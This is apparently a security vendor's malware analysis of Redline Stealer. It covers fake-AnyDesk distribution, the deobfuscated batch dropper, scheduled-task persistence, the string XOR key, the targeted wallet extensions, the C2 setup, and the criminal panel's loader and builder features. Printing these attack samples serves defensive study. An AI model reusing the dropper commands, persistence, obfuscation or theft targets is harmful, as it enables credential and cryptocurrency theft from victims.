Redline Stealer is one of the most popular stealers being sold and used by cybercriminals. The command and control (C2) panel does not require an attacker to log in via the Web UI; everything can be managed via the Redline client on the attacker’s virtual private server (VPS). The functionality of the stealer contains multiple capabilities including obfuscation, which makes it easy for attacker(s) to manage.
This malware analysis delves deeper into the technical details of how the Redline Stealer malware operates and our security recommendations to protect your organization from being exploited.
Key Takeaways
- Redline Stealer is mostly being distributed via fake software. Attacker(s) also use YouTube and/or other third-party advertising platforms to spread the stealer.
- Attacker(s) use an AutoIt wrapper and various crypting services to obfuscate the stealer binary.
- Redline comes with loader tasks that allow an attacker to perform various actions on the infected host including file download, process injection and command execution.
- Redline uses Windows Communication Foundation (WCF) with NetTCPBinding for C2 communication.
- Redline Stealer does not exfiltrate logs from Commonwealth of Independent States (CIS) countries.
Case Study
eSentire’s Threat Response Unit (TRU) has observed Redline Stealer being distributed via fake software, AnyDesk. The landing page of the malicious website is identical to the legitimate AnyDesk website (Figures 1-2).
The fake AnyDesk installer comes in an ISO image file and is 312MB in size. This is a common practice for stealers to pad the binary with junk hex bytes to increase the file size since some sandboxes and antiviruses have file size limitations. The infection chain is shown in Figure 3.
The AnyDesk binary contains the cabinet file within RCData (Figure 4). The extracted cabinet file contains the following:
- Imagine.potm (cb8603e18dca2737e3d96303ce11977d)
- Ritornata.potm (eed2bf43d57a34bb01e3a313e780febb)
- Saputo.potm (3139d6dc3c8632c9e8081339cf828d83)
The AnyDesk binary contains the section POSTRUNPROGRAM with the command cmd /c cmd < Saputo.potm & ping -n 5 localhost. The command executes the obfuscated Saputo.potm file and then pings the localhost five times, which is intended for the malware to sleep for 5 seconds so the obfuscated file can successfully run.
The deobfuscated Saputo.potm file is shown below:
tasklist /FI "imagename eq PSUAService.exe" 2>NUL | find /I /N "psuaservice.exe">NUL if not errorlevel 1 Set pEoQCZpLBzfzlhEvxHCjS=autoit.exe <nul set /p = "ZcDpijTWATBmXUDhlfiobLGsqbhgrZ" > pEoQCZpLBzfzlhEvxHCjS MrKXuUkCoPoGpMSbrwAewuXYoFFLRDZyqNxindstr /V /R "^YbeRstbFtOUDIqBrtdMHJUtzjhOkoKZFTdVtvyDmPFkahUrGQWaXBcArzIFrfkvxPgKsybGZNhRtJLyalocksetbQRLOA$" Ritornata.potm >> pEoQCZpLBzfzlhEvxHCjS ZcDpijTWATBmXUDhlfiobLGsqbhgrove Imagine.* t pEoQCZpLBzfzlhEvxHCjS t ping localhost -n 5
The script looks for PSUAService.exe on the infected system, which is a part of Panda Cloud Antivirus Software. If the mentioned antivirus is not present on the system, the malware will execute the main payload with the renamed AutoIt tool.
imagine.potm contains the obfuscated AutoIt script where Redline stealer resides. The embedded Redline binary contains within the obfuscated AutoIt script is shown in Figure 6.
The RC4 key to decode the script is concatenated with decimal values and subtracted by 2 as shown below (snipped of the obfuscated AutoIt script):
$jnpcgiMxrEdJ = zRAVrukiOcYK(mygFPnMUDEBWrobGzyl(mwKlCHGodCtOveXOxogMpp(Binary($uSDnetQy), Binary(TtmigjRVnUPf("59[53[51[58[53[53[56[53[58[59",2)))), $UkyGgZA, $XUeaTHbWBqM)
The eSentire TRU team has observed that the threat actor(s) have been using the AutoIt wrapper to obfuscate stealers such as Mars Stealer. For a more in-depth analysis, read our blog on Mars Stealer wrapped with AutoIt.
After the execution of the binary, the files mentioned in Figure 4 will be extracted from the CAB file into IXPxxx.TMP folder under the %TEMP% path as shown in Figure 7. The renamed NTDLL.DLL file is also dropped to the folder. This is a known technique used by threat actor(s) to bypass EDR detections – loading the copy of NTDLL.DLL during the runtime. We have briefly described this technique in our Mars Stealer analysis.
An additional folder is created to run a scheduled task from, this is the persistence technique to make sure that the infected host periodically communicates with the C2.
The scheduled task creation command line (the scheduled task is named Puoi and is set to run the z file under folder %TEMP%zqNDtAgMrV, which is the obfuscated AutoIt script containing the stealer, every 3 minutes):
schtasks.exe /create /tn "Puoi" /tr "C:UsersuserAppDataLocalTempzqNDtAgMrVPJDKIgRDMm.exe.com C:UsersuserAppDataLocalTempzqNDtAgMrVz" /sc minute /mo 3 /F
The deobfuscated binary contains Redline Stealer that is injected into jsc.exe process after being decrypted by a rename AutoIt process as shown in Figure 7.
The extracted .NET Redline payload is approximately 619KB in size (MD5: ee5c2ec0ec6d2b5b9c2396fb7513f83b), the original filename is Test.exe, and the compilation timestamp is July 24, 2022. Upon opening the file in a debugger, we can see that the stealer performs enumeration on the victim’s machine looking for installed browsers, FTP connections, security tools, software, crypto wallets (Figure 9).
We can also see the stealer collecting credit card (CC) information on the infected host from Chrome browsers (Figure 10).
Redline Stealer Behind The Scenes
Redline Stealer, also known as REDGlade and Glade, first appeared on hacking forums in February 2020 (Figure 11). Redline is allegedly written based on feedback from people involved in carding, the term describing an unauthorized usage of credit cards.
Similar to Raccoon Stealer, Redline requires a VPS (Virtual Private Server) dedicated server to host the panel. The stealer can be easily bought via a Telegram Bot (Figure 12) using cryptocurrency as a payment method. The price for Redline is $150USD per month and $900USD for lifetime access. Upon purchasing Redline, the user gets a link to the private chat in Telegram. At the time of this analysis, roughly 400 members were part of the telegram group. Based on a review of the chats, Russian native speakers were the most active. After the subscription expires, the user is removed from the private chat.
Redline Stealer capabilities include:
- Grabbing cookies, autofill, credit cards, login, and passwords from browsers.
- Supported browsers: Microsoft Edge, all Chromium-based browsers including the latest version of Chrome, all Gecko-based browsers including Mozilla Firefox
- Grabbing FTP and Instant Messaging clients’ passwords.
- Behaving as a Loader malware so it can be used as a vehicle to load additional malware to the network (e.g., ransomware).
- Enabling the adversary to choose which country the stealer can grab the logs from and add certain countries to the blacklist.
- Gathering system information on the infected host including IP, country, processor information, username, HWID, keyboard layout, screenshot, Operating System, UAC (User Account Control) settings, installed antiviruses.
- Extracting VPN credentials including NordVPN, OpenVPN and ProtonVPN.
- Extracting Steam, Discord and Telegram data.
- Extracting crypto wallets.
- List of supported crypto wallets: Bitcoin, Litecoin, 42Coin, Atomic, Alphacoin, Americancoin, AndroidsTokens, Anoncoin, Argentum, AsicCoin, avingCoin, BBQCoin, BeaoCoin, BitBar, bitgem, bits, Blakecoin, Bottlecaps, BountyCoin, Bytecoin, CasinoCoin, CHNCoin, Cloudcoin, Coinomi, Colossuscoin, Copper Bars, CosmosCoin, CPU2coin, Craftcoin, Crimecoin, CryptogenicBullion, CryptogenicBullionC, Devcoin, Diamond, DigitalCoin, Dogecoin, DollarPounds, Dragoncoin, EagleCoin, Earthcoin, ElephantCoin, Electrum, Exodus, Ethereum, Extremecoin, EzCoin, Fastcoin, FeatherCoin, FerretCoin, Florincoin, Franko, FrankoCoin, FreeCoin, Freicoin, Galaxycoin, Gamecoin, Guarda, GlobalCoin, Goldcoin, Grain, GrandCoin, Growthcoin, HoboNickels, infinitecoin, ItalyCoin, Ixcoin, Joulecoin, Jaxx, Jupitercoin, KingCoin, krugercoin, last Coin, Lebowskis, Liquidcoin, Lucky7Coin, LuckyCoin, Maples, mastercoin, MasterCoin, Mavro, Megacoin, MEMEcoin, MemoryCoin, Monero, Mincoin, NaanaYaM, Namecoin, NanoTokens, Neocoin, NetCoin, NovaCoin, Nuggets, NXTCoin, Onecoin, OpenSourcecoin, Orbitcoin, Paycoin, PEERCoin, Pennies, PeopleCoin, PhenixCoin, Philosopherstone, PlayToken, PPcoin, PrimeCoin, ProtoShares, ProtoSharesCoin, QuarkCoin, RealCoin, Redcoin, RichCoin, RoyalCoin, Sauron Rings, Secondscoin, SecureCoin, Sexcoin, SHITcoin, Sifcoin, Skycoin, Spots, supercoin, TagCoin, TEKcoin, Terracoin, TicketsCoin, tumcoin, UnitedScryptCoin, Unobtanium, UScoin, ValueCoin, Worldcoin, Waves, XenCoin, YACoin, Ybcoin, ZcCoin, ZenithCoin, Zetacoin.
What makes Redline Stealer popular is that the control panel is quite easy to navigate through; once the user buys the stealer, they get the detailed instructions in English and Russian on Redline functionality and installation steps (Figure 13).
It is worth noting that there are a number of fake Redline sellers on Telegram who profit by luring those interested in acquiring Redline Stealer, scamming them by taking their money, and not providing Redline in exchange. Upon purchasing a Redline subscription, the user gets the link to the private Telegram chat and the request to access chat must be approved by the administrator.
The Redline panel (Figure 14) is easy to navigate through and contains the following sections:
- Logs – display information about the infected hosts such as HWID, IP Addresses, build ID of the stealer used and countries and number of captured credentials.
- Statistic panel – displays the amount of stolen information on hosts, the top 10 OS (Operating Systems), antiviruses, and countries (Figure 14).
- Advertisement panel – shows the links to third-party service providers (Figure 15).
- Guest Links – used for users who spread the stealers via installers or advertisers. We believe that this link is used to build up a statistical panel of the users who visited the malicious landing page that hosts the payload.
- Loader Tasks – contains interesting features allowing an attacker to load additional payloads to the infected machine such as (Figure 16):
- Download – downloads the payload via the direct link to the specified folder.
- DownloadAndEx – downloads the payload via the direct link to the specified folder and executes it (e.g., https://example.com/payload.ex…filename.exe).
- OpenLink – opens the specified website in the victim’s browser (e.g., https://example.com/payload.ex…).
- Cmd – command line execution on the victim’s machine.
- RunPE – receives the payload via the direct link and then launches the file in the memory under another process (process injection). The eligible processes are all the executables under C:WindowsMicrosoft.NETFrameworkv4.0.30319 path (e.g., https://example.com/payload.ex…).
- “FinalPoint” field – contains the number of successful executions from the tasks specified by an attacker; after reaching the number of executions, the task is considered to be completed. The attacker can include the filters for specific Country, IP, OS and BuildID in the “Field” section to perform the tasks on. The “Domain Check” section allows an attacker to look for the presence of specific domains in the extracted passwords from the infected host (e.g., paypal.com | facebook.com).
- Log Sorter – the feature allows the attacker to sort the logs by the country, BuildID, OS, cookies, and passwords by the domain. The attacker can specify what type of logs will be saved to the machine (Figure 17).
- Wallet Checker – allows an attacker to check for the cryptocurrency balance of the stolen crypto wallet.
- Builder – one of the crucial parts of the panel (Figure 18). This is where the attacker specifies the IPs of their servers, the Build ID, generates the stealer payload, signs the file, and obfuscates it if needed. The attacker can also specify the fake error message for the victims when they open the executable.
- “Send log by parts” allows the attacker to receive the stolen logs in parts, so if the antivirus (AV) flags the stealer during the runtime or right before the launch, the stealer will send everything it was able to collect on the host before the AV jumps in (it is worth noting that this feature is enabled by default on Raccoon Stealer v2).
- Misc – in the Misc section, an attacker can create a clone of the payload and add extra bytes to increase the file size of the payload (antivirus and anti-sandbox evasion technique we have mentioned previously).
- Telegram – in the Telegram section, an attacker can specify their Telegram Bot that is used to receive the logs and notify the attacker on the successful infection by sending the specified logs (Figure 19).
- The Notifications panel contains panel events (e.g., it shows the completed tasks or if there is a duplicate log received).
- Black Lists – the attacker can specify the countries, IPs an HWIDs, build IDs from where the stealer will not exfiltrate data from (Figure 20). It’s worth mentioning that all countries in the Commonwealth of Independent States (CIS) are blacklisted automatically, and instead, attackers who aim to receive the stolen logs from CIS countries usually switch to MetaStealer as the anti-CIS is not applicable for this MetaStealer.
- Settings – contains the functionality of the stealer specified by an attacker – the data that needs to be exfiltrated and what folders and domains to search for (Figure 21).
Facebook logs are one of the popular stolen logs being bought on hacking forums (Figures 22-23). The stealer logs that contain cookies can be enticing to cybercriminals. With the cookies, an attacker would be able to bypass two-factor authentication. By using the stolen cookie, the threat actor would be able to authenticate as another user on platforms such as YouTube and Facebook.
Cybercriminals buy stolen Facebook accounts to push malicious advertisements without the user’s knowledge. Spend logs are the accounts where an attacker can spend a certain amount of money to publish their ads per day (Figure 22).
There are numerous services available where attackers can sell their stolen logs. The prices depend on what type of logs they are selling (Figure 24).
Redline logs are also in high demand on dark web markets such as RussianMarket. We can see that compared to other stealers, Redline logs are the most sold by cybercriminals (Figure 25).
It is worth noting that Redline is being distributed not only via cracked or fake software. Other means to distribute Redline are via installers and YouTube traffic (Figure 26). With YouTube traffic, an attacker would create or purchase the channel and upload a short video with the description to lure the user to install the application via the direct link.
The installers push the stealer to third-party advertising networks or platforms. The advertising service will display the ads on different webpages based on the countries that the attacker(s) specifies. (Figure 27).
More seasoned cybercriminals usually crypt or obfuscate the payload through the well-known crypters in the hacking channels named Mastif and 11. Redline also advertises one of crypters named Spectrcrypt or Spectrum Crypt which comes for free with a one-month subscription purchase (Figure 28).
The Redline logs are quite popular for sale on hacker forums and Telegram (Figures 29-30).
Redline Technical Analysis
The non-obfuscated Redline payload is a 32-bit .NET binary with 107 KB in size. The hash of the payload and original filename changes each time the build/payload is generated from the Redline panel.
The Argument class contains the encoded payload configuration for C2 communication including the IP address, Build ID, version and the XOR key used to decrypt the configuration parameters (Figure 31).
The encoded strings are base64-encoded and XOR-ed with the hardcoded key “Raves” then base64-encoded again (Figure 32).
Under Entity16, the stealer enumerates the Login Data, Web Data, Cookies folders for Chrome and Opera GX Stable. It also searches for crypto wallet browser extensions under Local Extension Settings folders for Chrome (Figure 33).
The crypto wallet extensions decoded from Base64-encoded blob:
ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet | ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink | jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet |
nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask | afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet | hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase |
fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain | odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet | hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet |
blnieiiffboillknjnepogjhkgnoapac|EqualWallet | cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty | fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet |
kncchdigobghenbbaddojjnnaogfppfj|iWallet | amkmjjmmflddogmhpjloimipbofnfjih|Wombat | fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet |
nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx | nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet | nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet |
fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet | aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation | fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet |
aeachknmefphepccionboohckonoeemg|Coin98Wallet | cgeeodpfagjceefieflmdfphplkenlfk|TonCrystal | pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain |
bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom | fhilaheimglignddkjgofkcbgekhenbh|Oxygen | mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet |
aodkkagnadcbobfpggfnjeongemjbjca|BoltX | kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet | hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet |
lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet | dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet | ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet |
ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink | jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet | nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask |
afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet | hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase | fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain |
odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet | hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet | blnieiiffboillknjnepogjhkgnoapac|EqualWallet |
cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty | fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet | kncchdigobghenbbaddojjnnaogfppfj|iWallet |
amkmjjmmflddogmhpjloimipbofnfjih|Wombat | fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet | nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx |
nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet | nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet | fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet |
aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation | fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet | aeachknmefphepccionboohckonoeemg|Coin98Wallet |
cgeeodpfagjceefieflmdfphplkenlfk|TonCrystal | pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain | bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom |
fhilaheimglignddkjgofkcbgekhenbh|Oxygen | mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet | aodkkagnadcbobfpggfnjeongemjbjca|BoltX |
kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet | hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet | lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet |
dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet | bhghoamapcdpbohphigoooaddinpkbai|Authenticator | ookjlbkiijinhpmnjffcofjonbfbgaoc|TempleWallet |
Entity15 is likely used for performing the loader tasks (Figure 34).
The ConfigReader class looks for crypto wallets in the folders specified by an attacker in settings. Entity17 contains the information on crypto wallets. Entity16 stores the path to crypto wallets (Figure 35).
ConnectionProvider class contains the C2 communication method used in Redline. Communication with the C2 server is established via Windows Communication Foundation (WCF) with NetTCPBinding. The WCF TCP transport utilizes the net.tcp:// protocol. The destination port is specified by an attacker (Figure 36).
The example of C2 traffic generated by the workstation infected with Redline containing the stealer configuration, C2 IP, host information and files residing on the host (Figure 37); tempuri[.]org is the default WCF namespace and should not be considered as the only indicator of Redline compromise.
Entity5 gathers Discord tokens under AppDataRoamingdiscordLocal Storageleveldb path from .log and .db files (Figure 38). Redline harvests the Discord tokens because they can bypass Two Factor Authentication (2FA) and allow users to access their accounts without providing credentials. All that is needed is the link. For detection evasion purposes, Redline adds random words into the strings and then replaces them.
Entity6 contains the module responsible for launching the loader tasks DownloadAndEx and Download (Figure 39).
Entity8, 10, 11 and 12 within EntityCreator class scans for autofills, cookies, credentials, and credit cards accordingly (Figure 40). The credentials will be then decrypted in the EntityReader class.
Previously, we mentioned that Redline stealer does not exfiltrate logs from CIS countries. The stealer checks for the local time zone of the infected machine and the default user interface language for the presence of languages used by CIS countries (Figure 41).
PartsSender class contains all the information (logs) that are sent to the attacker including user’s system information, files, wallets, credentials, and screenshot (Figure 42).
The Redline developers cleverly named the Telegram stealing module RosComNadzor (The Federal Service for Supervision of Communications, Information Technology and Mass Media).
Finally, SystemInfoHelper class (Figure 43) gathers the user’s system information, list of processes, browsers, installed programs, and sends them to the attacker as text files (Figures 44-45).
How eSentire is Responding
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create practical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity threats by deploying countermeasures, such as:
- Implementing threat detections to identify malicious command execution and ensure that eSentire has visibility and detections are in place across eSentire MDR for Endpoint and esNetwork.
- Performing global threat hunts for indicators associated with Redline Stealer.
Our detection content is supported by investigation runbooks, ensuring our team of 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
Recommendations from eSentire’s Threat Response Unit (TRU)
We recommend implementing the following controls to help secure your organization against the Redline Stealer malware:
While the TTPs used by threat actor(s) grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack technique and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detections, and the ability to investigate logs & network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Appendix
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-redline-stealer